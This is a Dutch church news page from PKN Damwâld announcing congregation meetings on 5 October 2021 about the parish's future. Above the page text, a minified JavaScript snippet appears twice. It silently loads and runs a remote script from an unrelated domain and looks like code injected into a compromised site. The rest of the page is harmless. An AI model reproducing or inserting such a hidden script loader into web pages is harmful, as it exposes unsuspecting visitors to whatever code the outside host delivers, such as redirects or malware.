;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nieuws rond de gemeenteavond 5 oktober 2021 - PKN Damwâld

Nieuws rond de gemeenteavond 5 oktober 2021

Gepubliceerd op: maandag 13 september 2021

Er is wat meer ruimte gekomen in de beperkingen. We gaan voor nu uit van vaste zitplaatsen op gepaste afstand zonder mondkapje.
Binnenkort ontvangt u een uitnodiging in de brievenbus, aanmelden is niet nodig.

Al eerder hebben we in de Paadwizer gemeld, dat we in het najaar met de gemeenteleden in gesprek willen over de (nabije) toekomst. Nu we zo’n anderhalf jaar kerkdiensten houden met elkaar lijkt het ons goed om met u/jullie in gesprek te gaan over een mogelijk vervolg. Dat willen we doen in twee aparte gemeentevergaderingen (Hervormd en Gereformeerd), op dezelfde avond, te weten op dinsdag 5 oktober om 19.30 uur.
We willen als gemeente met elkaar van gedachten wisselen over de toekomst en invulling van onze gemeente. Vervolgens gaan we de uitkomsten van deze avond in het SOW moderamen bespreken en evalueren, om daarop de plannen voor volgend jaar te kunnen baseren.

We houden u via website, Klok, Tsjerkenijs en Paadwizer op de hoogte. Ontvangt u de Klok/Tsjerkenijs nog niet via de mail, maar zou u dat wel willen? Meld u dan aan via janr.reitsma@gmail.com (Geref.) of hervormdambv@hotmail.com (Hervormd).
Hartelijke groet vanuit beide kerkenraden,
Sjoerd Postma en Janet Alkema